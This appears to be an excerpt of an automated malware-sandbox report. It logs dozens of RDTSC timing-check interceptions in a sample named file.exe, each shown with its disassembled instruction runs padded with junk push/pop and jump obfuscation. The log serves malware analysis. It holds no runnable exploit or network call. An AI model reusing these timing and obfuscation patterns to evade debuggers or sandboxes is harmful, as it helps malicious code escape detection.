                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286B33 second address: 286B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ECCCADECh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286B43 second address: 286B4B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286B4B second address: 286B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286B51 second address: 286B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286B57 second address: 286B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286B5B second address: 286B88 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FD7ED12076Fh 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jbe 00007FD7ED12077Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d jc 00007FD7ED120766h 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286B88 second address: 286B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2231C2 second address: 2231C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284DBB second address: 284DBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2231C7 second address: 2231D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD7ED120766h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284DBF second address: 284DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2231D1 second address: 22320D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD7ED120777h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FD7ED120768h 0x00000015 jmp 00007FD7ED120773h 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284DC5 second address: 284DDB instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD7ECCCADECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22320D second address: 223214 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284DDB second address: 284DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2896F3 second address: 2896F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2896F9 second address: 2896FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2896FD second address: 28970A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2873BE second address: 2873DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD7ECCCADF7h 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28970A second address: 289717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 je 00007FD7ED120766h 0x0000000c popad 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2873DC second address: 2873F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FD7ECCCADECh 0x00000010 jnl 00007FD7ECCCADE6h 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 289717 second address: 28971C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28971C second address: 28972F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007FD7ECCCADF2h 0x0000000b jnl 00007FD7ECCCADE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28B772 second address: 28B78F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD7ED12076Dh 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28B78F second address: 28B7C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FD7ECCCADFCh 0x0000000c jmp 00007FD7ECCCADF6h 0x00000011 jmp 00007FD7ECCCADF2h 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291CC4 second address: 291CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD7ED120766h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291FEB second address: 291FFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7ECCCADEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291FFF second address: 29200F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD7ED120766h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 295CB8 second address: 295CE3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7ECCCADE8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FD7ECCCADEAh 0x00000015 mov eax, dword ptr [eax] 0x00000017 jl 00007FD7ECCCADF4h 0x0000001d pushad 0x0000001e jl 00007FD7ECCCADE6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29DBD2 second address: 29DBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29DBD6 second address: 29DBF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FD7ECCCADE6h 0x0000000e jmp 00007FD7ECCCADF3h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29DBF7 second address: 29DBFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29CFD5 second address: 29CFF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7ECCCADF2h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29CFF3 second address: 29CFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D174 second address: 29D178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D178 second address: 29D17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D17E second address: 29D18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FD7ECCCADE6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D745 second address: 29D749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D749 second address: 29D764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD7ECCCADF2h 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D764 second address: 29D78E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD7ED12077Ah 0x00000008 pushad 0x00000009 jmp 00007FD7ED12076Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D8DC second address: 29D8E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D8E0 second address: 29D8E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D8E6 second address: 29D90C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD7ECCCADEEh 0x00000008 ja 00007FD7ECCCADE6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FD7ECCCADEFh 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D90C second address: 29D910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4269 second address: 2A4278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 jnp 00007FD7ECCCADEEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22EDF9 second address: 22EE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FD7ED12076Eh 0x0000000b jp 00007FD7ED120766h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22EE0C second address: 22EE12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A2DC3 second address: 2A2DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A2DC7 second address: 2A2DE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF4h 0x00000007 jp 00007FD7ECCCADE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A2F4C second address: 2A2F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ED12076Ah 0x00000009 pop edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A2F5B second address: 2A2F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A3389 second address: 2A338E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A3779 second address: 2A37AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD7ECCCADE6h 0x00000008 jmp 00007FD7ECCCADF3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FD7ECCCADF8h 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A37AE second address: 2A37B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A37B5 second address: 2A37FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007FD7ECCCADFDh 0x0000000b jmp 00007FD7ECCCADF5h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jnp 00007FD7ECCCADFFh 0x0000001b jmp 00007FD7ECCCADF9h 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pop edi 0x00000024 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A3AF7 second address: 2A3B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A3B03 second address: 2A3B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jnc 00007FD7ECCCADE6h 0x00000012 jmp 00007FD7ECCCADF2h 0x00000017 popad 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A295E second address: 2A2972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ED12076Eh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A2972 second address: 2A299D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF2h 0x00000007 jmp 00007FD7ECCCADEFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A299D second address: 2A29BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007FD7ED12076Ch 0x0000000b pushad 0x0000000c jmp 00007FD7ED12076Bh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26922C second address: 269232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269232 second address: 25191F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jnc 00007FD7ED12076Ch 0x0000000f lea eax, dword ptr [ebp+1247DF11h] 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FD7ED120768h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f adc dh, FFFFFFCFh 0x00000032 push eax 0x00000033 jmp 00007FD7ED12076Ah 0x00000038 mov dword ptr [esp], eax 0x0000003b pushad 0x0000003c mov esi, dword ptr [ebp+122D2E63h] 0x00000042 popad 0x00000043 call dword ptr [ebp+122D1D24h] 0x00000049 pushad 0x0000004a jmp 00007FD7ED12076Bh 0x0000004f pushad 0x00000050 jmp 00007FD7ED120778h 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269458 second address: 269472 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FD7ECCCADECh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269472 second address: 269477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269765 second address: 269780 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD7ECCCADE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FD7ECCCADEAh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269920 second address: 269952 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jnp 00007FD7ED120770h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD7ED12076Eh 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269952 second address: 269958 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269958 second address: 26995F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26995F second address: 26997E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD7ECCCADF3h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26997E second address: 2699C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD7ED120770h 0x0000000c jmp 00007FD7ED12076Eh 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 jmp 00007FD7ED12076Ah 0x0000001c pop eax 0x0000001d mov dx, cx 0x00000020 push 3F47673Bh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2699C2 second address: 2699C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2699C6 second address: 2699CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2699CA second address: 2699D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269DF6 second address: 269E00 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269E00 second address: 269E43 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FD7ECCCADE8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 add dword ptr [ebp+122D39DCh], ebx 0x0000002b push 00000004h 0x0000002d and ecx, 7A4142F2h 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push edi 0x00000039 pop edi 0x0000003a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269E43 second address: 269E4D instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269E4D second address: 269E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7ECCCADECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269E5E second address: 269E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD7ED120774h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 269E7C second address: 269E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A193 second address: 26A199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A199 second address: 26A19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A19D second address: 26A1A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A4D0 second address: 26A4D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26A4D5 second address: 26A509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD7ED120766h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FD7ED120771h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push ecx 0x00000018 push ecx 0x00000019 jg 00007FD7ED120766h 0x0000001f pop ecx 0x00000020 pop ecx 0x00000021 mov eax, dword ptr [eax] 0x00000023 push edi 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A7CCF second address: 2A7CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD7ECCCADF5h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A7CEB second address: 2A7CF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A7CF1 second address: 2A7CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 269935 second address: 269952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD7ED12076Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A7FD4 second address: 2A7FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FD7ECCCADF5h 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A8141 second address: 2A8145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
